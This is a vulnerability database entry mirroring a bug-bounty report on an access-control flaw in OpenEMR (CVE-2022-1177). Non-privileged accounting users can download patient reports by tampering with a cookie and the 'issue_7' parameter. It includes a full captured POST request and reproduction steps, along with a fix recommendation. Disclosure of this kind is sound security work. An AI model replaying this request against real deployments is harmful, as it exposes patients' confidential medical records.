Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrR00tpgp0BB2979B-9643-4CDF-AB58-4354976B481B
HistoryMar 11, 2022 - 6:12 a.m.

Accounting User Can Download Patient Reports in openemr

2022-03-1106:12:02
r00tpgp
www.huntr.dev
26
openemr
insecure direct object reference
patient reports
vulnerable endpoint
access control
http post request
cookie tampering
user authentication
acl check

EPSS

0.003

Percentile

68.2%

JSON

Vulnerability Type

Insecure Direct Object Reference

Affected URL

https://localhost/openemr/interface/patient_file/report/custom_report.php

Affected Parameters

“Issue_7”

Authentication Required?

Yes

Issue Summary

Non-privilege users (accounting & front-office) can download patient reports containing medical reports and documents by sending a request to a vulnerable end-point. There is no Access Control enforced, therefore, any authenticated user of OpenEMR can download patient records by just tampering the “Issue_7” parameter to any valid number. By incrementing this value, an unauthorized user can download patient records.

Recommendation

Implement ACL check to ensure that only authorized users of OpenEMR system are able to download patient documents from the vulnerable end-point.

Credits

Aden Yap Chuen Zhen ([email protected])
Rizan, Sheikh
([email protected])
Ali Radzali
([email protected])

Issue Reproduction

Login to OpenEMR as Admin and capture the POST request to the following end-point:

https://localhost/openemr/interface/patient_file/report/custom_report.php

In Burp, the HTTP POST request, cookie “OpenEMR” & parameter “issue_7” can be tampered.

Host: 192.168.0.141
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Origin: http://192.168.0.141
Connection: close
Referer: http://192.168.0.141/openemr/interface/patient_file/report/patient_report.php
Cookie: OpenEMR=E6toaL3R-180fA2-MIw80a-G7PJPCapZxrTYIzY%2Cofj5CXEG
 
Upgrade-Insecure-Requests: 1
 
include_demographics=demographics&include_billing=billing&pdf=1&issue_8=%2F&issue_10=%2F&issue_7=%2F14%2F&issue_6=%2F&issue_9=%2F&issue_11=%2F&issue_12=%2F

Replace the “OpenEMR” Cookie with Accountant Cookie and increment the “issue_7” parameter to any valid number eg “issue_7=/15/” to access patient documents.

Related

openvas 1
prion 1
cve 1
cnvd 1
osv 1
nvd 1
cvelist 1
openvas
openvas
OpenEMR <= 6.1.0 Privilege Escalation Vulnerability
2022-04-05 00:00:00
prion
prion
Design/Logic Flaw
2022-03-30 11:15:00
cve
cve
CVE-2022-1177
2022-03-30 11:15:07
cnvd
cnvd
OpenEMR Information Disclosure Vulnerability (CNVD-2022-82260)
2022-04-01 00:00:00
osv
osv
CVE-2022-1177
2022-03-30 11:15:07
nvd
nvd
CVE-2022-1177
2022-03-30 11:15:07
cvelist
cvelist
CVE-2022-1177 Accounting User Can Download Patient Reports in openemr in openemr/openemr
2022-03-30 11:00:28

EPSS

0.003

Percentile

68.2%

JSON
Related for 0BB2979B-9643-4CDF-AB58-4354976B481B
openvas1prion1cve1cnvd1osv1nvd1cvelist1